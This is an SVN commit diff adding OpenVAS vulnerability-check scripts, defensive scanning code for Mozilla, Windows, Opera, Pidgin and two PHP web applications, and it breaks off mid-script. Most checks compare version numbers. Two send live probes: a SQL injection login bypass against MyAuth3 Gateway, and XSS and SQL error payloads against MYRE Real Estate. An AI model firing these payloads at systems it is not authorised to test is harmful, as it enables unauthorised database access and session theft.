+  script_name("Mozilla Products Multiple Vulnerabilities - Sep 11 (Windows)");
+  desc = "
+  Overview: The host is installed with Mozilla firefox/thunderbird/seamonkey
+  and is prone to multiple vulnerabilities.
+
+  Vulnerability Insight:
+  The flaws are caused due to,
+  - An error when using Windows D2D hardware acceleration, allows attacker to
+    obtain sensitive image data from a different domain.
+  - Heap overflow in the Almost Native Graphics Layer Engine(ANGLE) library
+    used in WebGL implementation.
+  - Buffer overflow error in the WebGL shader implementation.
+  - An error in the browser engine, it fails to implement WebGL, JavaScript
+  - An error in the Ogg reader in the browser engine.
+
+  Impact:
+  Successful exploitation will let attackers to execute arbitrary code in the
+  context of the user running an affected application. Failed exploit attempts
+  will result in a denial-of-service condition.
+
+  Impact Level: System/Application
+
+  Affected Software/OS:
+  Thunderbird version before 6
+  SeaMonkey version 2.0 through 2.2
+  Mozilla Firefox version 4.x through 5
+
+  Fix: Upgrade to Mozilla Firefox version 6.0 or later,
+  For updates refer, http://www.mozilla.com/en-US/firefox/all.html
+
+  Upgrade to SeaMonkey version to 2.3 or later
+  http://www.mozilla.org/projects/seamonkey/
+
+  Upgrade to Thunderbird version to 6.0 or later
+  http://www.mozilla.org/en-US/thunderbird/
+
+  References:
+  http://secunia.com/advisories/45581
+  http://www.mozilla.org/security/announce/2011/mfsa2011-29.html ";
+
+  script_description(desc);
+  script_summary("Check for the version of Mozilla Firefox/Thunderbird/SeaMonkey");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+  script_family("General");
+  script_dependencies("gb_firefox_detect_win.nasl",
+                      "gb_seamonkey_detect_win.nasl",
+                      "gb_thunderbird_detect_win.nasl");
+  script_require_keys("Firefox/Win/Ver", "Seamonkey/Win/Ver",
+                       "Thunderbird/Win/Ver");
+  exit(0);
+}
+
+
+include("version_func.inc");
+
+# Firefox Check
+ffVer = get_kb_item("Firefox/Win/Ver");
+if(ffVer)
+{
+  # Grep for Firefox version
+  if(version_in_range(version:ffVer, test_version:"4.0", test_version2:"5.0.1")){
+     security_hole(0);
+     exit(0);
+  }
+}
+
+# SeaMonkey Check
+seaVer = get_kb_item("Seamonkey/Win/Ver");
+if(seaVer)
+{
+  # Grep for SeaMonkey version
+  if(version_in_range(version:seaVer, test_version:"2.0", test_version2:"2.2"))
+  {
+     security_hole(0);
+     exit(0);
+  }
+}
+
+# Thunderbird Check
+tbVer = get_kb_item("Thunderbird/Win/Ver");
+if(tbVer != NULL)
+{
+  # Grep for Thunderbird version
+  if(version_is_less(version:tbVer, test_version:"6.0")){
+    security_hole(0);
+  }
+}

Added: trunk/openvas-plugins/scripts/gb_mozilla_prdts_sec_bypass_n_info_disc_vuln_win.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_mozilla_prdts_sec_bypass_n_info_disc_vuln_win.nasl	2011-09-09 11:52:42 UTC (rev 11593)
+++ trunk/openvas-plugins/scripts/gb_mozilla_prdts_sec_bypass_n_info_disc_vuln_win.nasl	2011-09-09 15:36:48 UTC (rev 11594)
@@ -0,0 +1,101 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_mozilla_prdts_sec_bypass_n_info_disc_vuln_win.nasl 16832 2011-09-06 12:15:33Z sep $
+#
+# Mozilla Products Information Disclosure and Security Bypass Vulnerabilities (Windows)
+#
+# Authors:
+# Madhuri D <dmadhuri at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(802152);
+  script_version("$Revision: 1.0$");
+  script_cve_id("CVE-2011-2990", "CVE-2011-2993");
+  script_bugtraq_id(49246, 49248);
+  script_tag(name:"cvss_base", value:"9.3");
+  script_tag(name:"risk_factor", value:"Critical");
+  script_name("Mozilla Products Information Disclosure and Security Bypass Vulnerabilities (Windows)");
+  desc = "
+  Overview: The host is installed with Mozilla firefox/seamonkey and is prone
+  to information disclosure and security bypass vulnerabilities.
+
+  Vulnerability Insight:
+  The flaws are caused due to implementation errors,
+  - In Content Security Policy (CSP) violation reports, which fails to remove
+    proxy-authorization credentials from the listed request headers.
+  - In digital signatures for JAR files, which fails to prevent calls from
+    unsigned JavaScript code to signed code.
+
+  Impact:
+  Successful exploitation will allow attackers to obtain sensitive information
+  and bypass the application's security mechanism.
+
+  Impact Level: Application
+
+  Affected Software/OS:
+  SeaMonkey version 2.0 through 2.2
+  Mozilla Firefox version 4.x through 5
+
+  Fix: Upgrade to Mozilla Firefox version 6.0 or later,
+  For updates refer, http://www.mozilla.com/en-US/firefox/all.html
+
+  Upgrade to SeaMonkey version to 2.3 or later
+  http://www.mozilla.org/projects/seamonkey/
+
+  References:
+  http://secunia.com/advisories/45581
+  http://www.mozilla.org/security/announce/2011/mfsa2011-29.html ";
+
+  script_description(desc);
+  script_summary("Check for the version of Mozilla Firefox/SeaMonkey");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+  script_family("General");
+  script_dependencies("gb_firefox_detect_win.nasl",
+                      "gb_seamonkey_detect_win.nasl");
+  script_require_keys("Firefox/Win/Ver", "Seamonkey/Win/Ver");
+  exit(0);
+}
+
+
+include("version_func.inc");
+
+# Firefox Check
+ffVer = get_kb_item("Firefox/Win/Ver");
+if(ffVer)
+{
+  # Grep for Firefox version
+  if(version_in_range(version:ffVer, test_version:"4.0", test_version2:"5.0.1"))
+  {
+     security_hole(0);
+     exit(0);
+  }
+}
+
+# SeaMonkey Check
+seaVer = get_kb_item("Seamonkey/Win/Ver");
+if(seaVer)
+{
+  # Grep for SeaMonkey version
+  if(version_in_range(version:seaVer, test_version:"2.0", test_version2:"2.2")){
+     security_hole(0);
+  }
+}

Added: trunk/openvas-plugins/scripts/gb_mozilla_prdts_svg_code_exec_vuln_win.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_mozilla_prdts_svg_code_exec_vuln_win.nasl	2011-09-09 11:52:42 UTC (rev 11593)
+++ trunk/openvas-plugins/scripts/gb_mozilla_prdts_svg_code_exec_vuln_win.nasl	2011-09-09 15:36:48 UTC (rev 11594)
@@ -0,0 +1,118 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_mozilla_prdts_svg_code_exec_vuln_win.nasl 16832 2011-08-24 13:15:33Z aug $
+#
+# Mozilla Products 'SVG' Code Execution Vulnerability (Windows)
+#
+# Authors:
+# Madhuri D <dmadhuri at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(802147);
+  script_version("$Revision: 1.0$");
+  script_cve_id("CVE-2011-0084");
+  script_bugtraq_id(49213);
+  script_tag(name:"cvss_base", value:"10.0");
+  script_tag(name:"risk_factor", value:"Critical");
+  script_name("Mozilla Products 'SVG' Code Execution Vulnerability (Windows)");
+  desc = "
+  Overview: The host is installed with Mozilla firefox/thunderbird/seamonkey
+  and is prone to arbitrary code execution vulnerability.
+
+  Vulnerability Insight:
+  The flaw is caused due to error in 'SVGTextElement.getCharNumAtPosition'
+  function, which fails to properly handle SVG text.
+
+  Impact:
+  Successful exploitation will let attackers to execute arbitrary code in the
+  context of the affected application. Failed exploit attempts will likely
+  result in denial-of-service conditions.
+
+  Impact Level: System/Application
+
+  Affected Software/OS:
+  SeaMonkey version 2.0 through 2.2
+  Thunderbird version 3.0 through 3.1.11
+  Mozilla Firefox version before 3.6.20 and 4.x through 5.0.1
+
+  Fix: Upgrade to Mozilla Firefox version 3.6.20 or 6.0 or later,
+  For updates refer, http://www.mozilla.com/en-US/firefox/all.html
+
+  Upgrade to SeaMonkey version to 2.3 or later
+  http://www.mozilla.org/projects/seamonkey/
+
+  Upgrade to Thunderbird version to 3.1.12 or later
+  http://www.mozilla.org/en-US/thunderbird/
+
+  References:
+  https://bugzilla.redhat.com/show_bug.cgi?id=730519
+  http://www.mozilla.org/security/announce/2011/mfsa2011-30.html ";
+
+  script_description(desc);
+  script_summary("Check for the version of Mozilla Firefox/Thunderbird/SeaMonkey");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+  script_family("General");
+  script_dependencies("gb_firefox_detect_win.nasl",
+                      "gb_seamonkey_detect_win.nasl",
+                      "gb_thunderbird_detect_win.nasl");
+  script_require_keys("Firefox/Win/Ver", "Seamonkey/Win/Ver",
+                       "Thunderbird/Win/Ver");
+  exit(0);
+}
+
+
+include("version_func.inc");
+
+# Firefox Check
+ffVer = get_kb_item("Firefox/Win/Ver");
+if(ffVer)
+{
+  # Grep for Firefox version
+  if(version_is_less(version:ffVer, test_version:"3.6.20")||
+     version_in_range(version:ffVer, test_version:"4.0", test_version2:"5.0.1"))
+  {
+     security_hole(0);
+     exit(0);
+  }
+}
+
+# SeaMonkey Check
+seaVer = get_kb_item("Seamonkey/Win/Ver");
+if(seaVer)
+{
+  # Grep for SeaMonkey version
+  if(version_in_range(version:seaVer, test_version:"2.0", test_version2:"2.2"))
+  {
+     security_hole(0);
+     exit(0);
+  }
+}
+
+# Thunderbird Check
+tbVer = get_kb_item("Thunderbird/Win/Ver");
+if(tbVer != NULL)
+{
+  # Grep for Thunderbird version
+  if(version_in_range(version:tbVer, test_version:"3.0", test_version2:"3.1.11")){
+    security_hole(0);
+  }
+}

Added: trunk/openvas-plugins/scripts/gb_ms_win_fraudulent_digital_cert_spoofing_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_ms_win_fraudulent_digital_cert_spoofing_vuln.nasl	2011-09-09 11:52:42 UTC (rev 11593)
+++ trunk/openvas-plugins/scripts/gb_ms_win_fraudulent_digital_cert_spoofing_vuln.nasl	2011-09-09 15:36:48 UTC (rev 11594)
@@ -0,0 +1,90 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_ms_win_fraudulent_digital_cert_spoofing_vuln.nasl 16939 2011-09-08 12:40:05Z sep $
+#
+# Fraudulent Digital Certificates Spoofing Vulnerability (2607712)
+#
+# Authors:
+# Antu Sanadi <santu at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(801975);
+  script_version("$Revision: 1.0$");
+  script_tag(name:"cvss_base", value:"5.0");
+  script_tag(name:"risk_factor", value:"Medium");
+  script_name("Fraudulent Digital Certificates Spoofing Vulnerability (2607712)");
+  desc = "
+  Overview: The host is installed with Microsoft Windows operating system and
+  is prone to spoofing vulnerability.
+
+  Vulnerability Insight:
+  The flaw is caused due to an error when handling the fraudulent digital
+  certificates issued by Comodo and it is not properly validating its
+  identity.
+
+  Impact:
+  Successful exploitation will allow remote attackers to spoof content, perform
+  phishing attacks or perform man-in-the-middle attacks against all Web browser
+  users including users of Internet Explorer.
+
+  Impact Level: System
+
+  Affected Software/OS:
+  Windows 7 Service Pack 1 and prior
+  Windows XP Service Pack 3 and prior
+  Windows Vista Service Pack 2 and prior
+  Windows Server 2003 Service Pack 2 and prior
+  Windows Server 2008 Service Pack 2 and prior
+
+  Fix: Apply the Patch from below link,
+  For updates refer, http://support.microsoft.com/kb/2607712
+
+  References:
+  http://support.microsoft.com/kb/2607712
+  http://www.microsoft.com/technet/security/advisory/2607712.mspx ";
+
+  script_description(desc);
+  script_summary("Check for the Microsoft Windows");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+  script_family("Windows");
+  script_dependencies("secpod_reg_enum.nasl");
+  exit(0);
+}
+
+
+include("smb_nt.inc");
+include("secpod_reg.inc");
+
+## Confirm Windows
+if(!get_kb_item("SMB/WindowsVersion")){
+  exit(0);
+}
+
+## Check for OS and Service Pack
+if(hotfix_check_sp(xp:4, win2003:3, winVista:3, win2008:3, win7:2) <= 0){
+  exit(0);
+}
+
+## Check Hotfix 2607712
+if(!(hotfix_missing(name:"2607712") == 0)){
+  security_warning(0);
+}

Added: trunk/openvas-plugins/scripts/gb_myauth3_gateway_blind_sql_inj_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_myauth3_gateway_blind_sql_inj_vuln.nasl	2011-09-09 11:52:42 UTC (rev 11593)
+++ trunk/openvas-plugins/scripts/gb_myauth3_gateway_blind_sql_inj_vuln.nasl	2011-09-09 15:36:48 UTC (rev 11594)
@@ -0,0 +1,108 @@
+##############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_myauth3_gateway_blind_sql_inj_vuln.nasl 17035 2011-09-09 10:50:29 sep $
+#
+# MyAuth3 Gateway 'pass' Parameter SQL Injection Vulnerability
+#
+# Authors:
+# Antu Sanadi <santu at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(801980);
+  script_version("$Revision: 1.0$");
+  script_bugtraq_id(49530);
+  script_tag(name:"cvss_base", value:"7.5");
+  script_tag(name:"risk_factor", value:"High");
+  script_name("MyAuth3 Gateway 'pass' Parameter SQL Injection Vulnerability");
+  desc = "
+  Overview: This host is running MyAuth3 Gateway and is prone SQL injection
+  vulnerability.
+
+  Vulnerability Insight:
+  The flaw exists due to the error in 'index.php', which fails to sufficiently
+  sanitize user-supplied input via 'pass' parameter before using it in SQL
+  query.
+
+  Impact:
+  Successful exploitation will allow remote attackers to view, add, modify or
+  delete information in the back-end database.
+
+  Impact Level: Application
+
+  Affected Software :
+  MyAuth3 Gateway version 3.0
+
+  Fix: No solution or patch is available as on 09th September, 2011. Information
+  regarding this issue will be updated once the solution details are available.
+  For updates refer, http://www.tmsoft.com.br/index.php
+
+  References:
+  http://doie.net/?p=578
+  http://www.1337day.com/exploits/16858
+  http://www.exploit-db.com/exploits/17805/ ";
+
+  script_description(desc);
+  script_summary("Determine SQL injection vulnerability in MyAuth3 Gateway");
+  script_category(ACT_ATTACK);
+  script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+  script_family("Web application abuses");
+  script_require_ports("Services/www", 1881);
+  exit(0);
+}
+
+
+include("http_func.inc");
+include("http_keepalive.inc");
+
+## Check for the default port
+myaPort = get_http_port(default:1881);
+if(!myaPort){
+  myaPort = 1881;
+}
+
+## Check the port state
+if(!get_port_state(myaPort)){
+  exit(0);
+}
+
+## request index page
+sndReq = http_get(item:"/index.php", port:myaPort);
+rcvRes = http_send_recv(port:myaPort, data:sndReq);
+
+## Confirm the Application
+if(">MyAuth3 Gateway</" >< rcvRes);
+{
+  ## Try an exploit
+  authVariables ="panel_cmd=auth&r=ok&user=pingpong&pass=%27+or+1%3D1%23";
+
+  ## Construct post request
+  sndReq = string("POST /index.php?console=panel HTTP/1.1\r\n",
+                   "Host: ", get_host_name(), "\r\n",
+                   "Content-Type: application/x-www-form-urlencoded\r\n",
+                   "Content-Length: ", strlen(authVariables), "\r\n\r\n",
+                   authVariables);
+  rcvRes = http_keepalive_send_recv(port:myaPort, data:sndReq);
+
+  ## Check the Response
+  if("cotas" >< rcvRes && ">Alterar" >< rcvRes && "senha&" >< rcvRes){
+    security_hole(myaPort);
+  }
+}

Added: trunk/openvas-plugins/scripts/gb_myre_real_estate_mult_xss_n_sql_inj_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_myre_real_estate_mult_xss_n_sql_inj_vuln.nasl	2011-09-09 11:52:42 UTC (rev 11593)
+++ trunk/openvas-plugins/scripts/gb_myre_real_estate_mult_xss_n_sql_inj_vuln.nasl	2011-09-09 15:36:48 UTC (rev 11594)
@@ -0,0 +1,120 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_myre_real_estate_mult_xss_n_sql_inj_vuln.nasl 17039 2011-09-09 17:14:14Z sep $
+#
+# MYRE Real Estate Software Multiple XSS and SQL Injection Vulnerabilities
+#
+# Authors:
+# Madhuri D <dmadhuri at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(802157);
+  script_version("$Revision: 1.0$");
+  script_tag(name:"cvss_base", value:"7.5");
+  script_tag(name:"risk_factor", value:"High");
+  script_name("MYRE Real Estate Software Multiple XSS and SQL Injection Vulnerabilities");
+  desc = "
+  Overview: The host is running MYRE Real Estate Software and is prone to
+  multiple cross site scripting and SQL injection vulnerabilities
+
+  Vulnerability Insight:
+  The flaws are caused due to input passed to the
+  - 'page' parameter in findagent.php is not properly sanitized before being
+    used in SQL queries.
+  - 'country1', 'state1', and 'city1' parameters in findagent.php are not
+    properly verified before it is returned to the user.
+
+  Impact:
+  Successful exploitation will let the attacker to execute arbitrary HTML and
+  script code in a user's browser session in the context of a vulnerable site
+  and to cause SQL Injection attack to gain sensitive information.
+
+  Impact Level: Application
+
+  Affected Software/OS:
+  MYRE Real Estate Software.
+
+  Fix: No solution or patch is available as on 9th September, 2011. Information
+  regarding this issue will be updated once the solution details are available.
+  For updates refer, http://myrephp.com/
+
+  References:
+  http://secpod.org/blog/?p=346
+  http://www.exploit-db.com/exploits/17811
+  http://secpod.org/advisories/SECPOD_MRS_SQL_XSS_Vuln.txt ";
+
+  script_description(desc);
+  script_summary("Check if MYRE Real Estate Software is prone to XSS and SQL Injection Vulnerability");
+  script_category(ACT_ATTACK);
+  script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+  script_family("Web application abuses");
+  script_dependencies("http_version.nasl");
+  script_require_ports("Services/www", 80);
+  exit(0);
+}
+
+
+include("http_func.inc");
+include("http_keepalive.inc");
+
+## Get HTTP Port
+port = get_http_port(default:80);
+if(!port){
+  exit(0);
+}
+
+## Check Host Supports PHP
+if(!can_host_php(port:port)){
+  exit(0);
+}
+
+foreach dir(make_list("/realestate", "", cgi_dirs()))
+{
+  ## Send and Receive the response
+  req = http_get(item: string (dir, "/index.php"), port:port);
+  res = http_keepalive_send_recv(port:port,data:req);
+
+  ## Confirm the application
+  if('MYRE Real Estate Software' >< res)
+  {
+    ## Try XSS exploit
+    req = http_get(item:string(dir, "/findagent.php?country1=<script>alert" +
+                          "(/document.cookie/)</script>"), port:port);
+    res = http_keepalive_send_recv(port:port,data:req);
+
+    # check the response to confirm vulnerability
+    if('"><script>alert(/document.cookie/)</script>' >< res){
+      security_hole(port:port);
+      exit(0);
+    }
+
+    ## Check for the SQL injection
+    req = http_get(item:string(dir, "/findagent.php?page='"), port:port);
+    res = http_keepalive_send_recv(port:port,data:req);
+
+    ## Check the SQL result
+    if(">You have an error in your SQL syntax;" >< res)
+    {
+      security_hole(port:port);
+      exit(0);
+    }
+  }
+}

Added: trunk/openvas-plugins/scripts/gb_opera_extented_validation_info_disc_vuln_macosx.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_opera_extented_validation_info_disc_vuln_macosx.nasl	2011-09-09 11:52:42 UTC (rev 11593)
+++ trunk/openvas-plugins/scripts/gb_opera_extented_validation_info_disc_vuln_macosx.nasl	2011-09-09 15:36:48 UTC (rev 11594)
@@ -0,0 +1,86 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_opera_extented_validation_info_disc_vuln_macosx.nasl 17032 2011-09-09 17:11:11Z sep $
+#
+# Opera Extended Validation Information Disclosure Vulnerabilities (Mac OS X)
+#
+# Authors:
+# Rachana Shetty <srachana at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(802333);
+  script_version("$Revision: 1.0$");
+  script_cve_id("CVE-2011-3388","CVE-2011-3389");
+  script_bugtraq_id(49388);
+  script_tag(name:"cvss_base", value:"10.0");
+  script_tag(name:"risk_factor", value:"Critical");
+  script_name("Opera Extended Validation Information Disclosure Vulnerabilities (Mac OS X)");
+  desc = "
+  Overview: The host is installed with Opera and is prone to information
+  disclosure vulnerability.
+
+  Vulnerability Insight:
+  Multiple flaws are caused due to, an error when loading content from trusted
+  sources in an unspecified sequence that causes the address field and page
+  information dialog to contain security information based on the trusted site
+  and loading an insecure site to appear secure via unspecified actions related
+  to Extended Validation.
+
+  Impact:
+  Successful exploitation allows remote attackers to steal sensitive security
+  information.
+
+  Impact Level: Application
+
+  Affected Software/OS:
+  Opera version before 11.51.
+
+  Fix: Upgrade to Opera version 11.51 or later
+  For updates refer, http://www.opera.com/download/
+
+  References:
+  http://osvdb.org/74828
+  http://osvdb.org/show/osvdb/74829
+  http://secunia.com/advisories/45791
+  http://www.securitytracker.com/id?1025997
+  http://www.opera.com/support/kb/view/1000/ ";
+
+  script_description(desc);
+  script_summary("Check for the version of Opera");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+  script_family("General");
+  script_dependencies("gb_opera_detect_macosx.nasl");
+  script_require_keys("Opera/MacOSX/Version");
+  exit(0);
+}
+
+include("version_func.inc");
+
+operaVer = get_kb_item("Opera/MacOSX/Version");
+if(!operaVer){
+  exit(0);
+}
+
+# Check for opera version < 11.51
+if(version_is_less(version:operaVer, test_version:"11.51")){
+  security_hole(0);
+}

Added: trunk/openvas-plugins/scripts/gb_opera_extented_validation_info_disc_vuln_win.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_opera_extented_validation_info_disc_vuln_win.nasl	2011-09-09 11:52:42 UTC (rev 11593)
+++ trunk/openvas-plugins/scripts/gb_opera_extented_validation_info_disc_vuln_win.nasl	2011-09-09 15:36:48 UTC (rev 11594)
@@ -0,0 +1,86 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_opera_extented_validation_info_disc_vuln_win.nasl 17032 2011-09-09 17:11:11Z sep $
+#
+# Opera Extended Validation Information Disclosure Vulnerabilities (Windows)
+#
+# Authors:
+# Rachana Shetty <srachana at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(802332);
+  script_version("$Revision: 1.0$");
+  script_cve_id("CVE-2011-3388","CVE-2011-3389");
+  script_bugtraq_id(49388);
+  script_tag(name:"cvss_base", value:"10.0");
+  script_tag(name:"risk_factor", value:"Critical");
+  script_name("Opera Extended Validation Information Disclosure Vulnerabilities (Windows)");
+  desc = "
+  Overview: The host is installed with Opera and is prone to information
+  disclosure vulnerability.
+
+  Vulnerability Insight:
+  Multiple flaws are caused due to, an error when loading content from trusted
+  sources in an unspecified sequence that causes the address field and page
+  information dialog to contain security information based on the trusted site
+  and loading an insecure site to appear secure via unspecified actions related
+  to Extended Validation.
+
+  Impact:
+  Successful exploitation allows remote attackers to steal sensitive security
+  information.
+
+  Impact Level: Application
+
+  Affected Software/OS:
+  Opera version before 11.51
+
+  Fix: Upgrade to Opera version 11.51 or later.
+  For updates refer, http://www.opera.com/download/
+
+  References:
+  http://osvdb.org/74828
+  http://osvdb.org/show/osvdb/74829
+  http://secunia.com/advisories/45791
+  http://www.securitytracker.com/id?1025997
+  http://www.opera.com/support/kb/view/1000/ ";
+
+  script_description(desc);
+  script_summary("Check for the version of Opera");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+  script_family("General");
+  script_dependencies("secpod_opera_detection_win_900036.nasl");
+  script_require_keys("Opera/Win/Version");
+  exit(0);
+}
+
+include("version_func.inc");
+
+operaVer = get_kb_item("Opera/Win/Version");
+if(!operaVer){
+  exit(0);
+}
+
+# Check for opera version < 11.51
+if(version_is_less(version:operaVer, test_version:"11.51")){
+  security_hole(0);
+}


Property changes on: trunk/openvas-plugins/scripts/gb_opera_extented_validation_info_disc_vuln_win.nasl
___________________________________________________________________
Name: svn:executable
   + *

Added: trunk/openvas-plugins/scripts/gb_pidgin_libpurple_protocol_plugins_dos_vuln_win.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_pidgin_libpurple_protocol_plugins_dos_vuln_win.nasl	2011-09-09 11:52:42 UTC (rev 11593)
+++ trunk/openvas-plugins/scripts/gb_pidgin_libpurple_protocol_plugins_dos_vuln_win.nasl	2011-09-09 15:36:48 UTC (rev 11594)
@@ -0,0 +1,89 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_pidgin_libpurple_protocol_plugins_dos_vuln_win.nasl 16936 2011-09-09 14:22:56Z sep $
+#
+# Pidgin Libpurple Protocol Plugins Denial of Service Vulnerabilities (Win)
+#
+# Authors:
+# Rachana Shetty <srachana at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(802331);
+  script_version("$Revision: 1.0$");
+  script_cve_id("CVE-2011-2943", "CVE-2011-3184", "CVE-2011-3185");
+  script_bugtraq_id(49268);
+  script_tag(name:"cvss_base", value:"9.3");
+  script_tag(name:"risk_factor", value:"Critical");
+  script_name("Pidgin Libpurple Protocol Plugins Denial of Service Vulnerabilities (Win)");
+  desc = "
+  Overview: This host is installed with Pidgin and is prone to denial of
+  service vulnerabilities.
+
+  Vulnerability Insight:
+  Multiple flaws are due to,
+  - An error in the IRC protocol plugin in libpurple when handling WHO
+    responses with special characters in the nicknames.
+  - An error in the MSN protocol plugin when handling HTTP 100 responses.
+  - Improper handling of 'file:// URI', allows to execute the file when user
+    clicks on a file:// URI in a received IM.
+
+  Impact:
+  Successful exploitation allows remote attackers to execute arbitrary code,
+  obtain sensitive information or cause a denial of service.
+
+  Impact Level: System/Application
+
+  Affected Software/OS:
+  Pidgin versions prior to 2.10.0
+
+  Fix: Upgrade to Pidgin version 2.10.0 or later.
+  For updates refer, http://pidgin.im/download/windows/
+
